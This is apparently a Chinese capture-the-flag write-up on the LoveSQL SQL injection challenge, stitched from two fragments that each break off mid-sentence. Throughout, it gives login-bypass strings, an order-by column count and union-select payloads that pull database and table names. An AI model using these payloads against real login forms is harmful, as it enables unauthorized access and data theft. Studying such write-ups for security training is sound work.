打开是一个登录界面使用admin'or1#万能密码绕过密码登录再使用admin'orderby3#找回显的列数，结果为3,再使用a'unionselect1,2,3#找回显的列，结果为2，3后面就是常规的union注入流程#找数据库和表名a'unionselect1,database(),group_concat(table_name)frominfor

[极客大挑战2019]LoveSQL1代码审计，发现表单方式为get提交到check.php万能密码admin'or1=1#登录成功，这边我以为密码就是flag，结果并不是，结合题目信息，猜想这应该是根据账号密码的注入尝试闭合?username=admin'and1=1%23&password=d3c9cf30a12d1f13d4f778859fb16f73正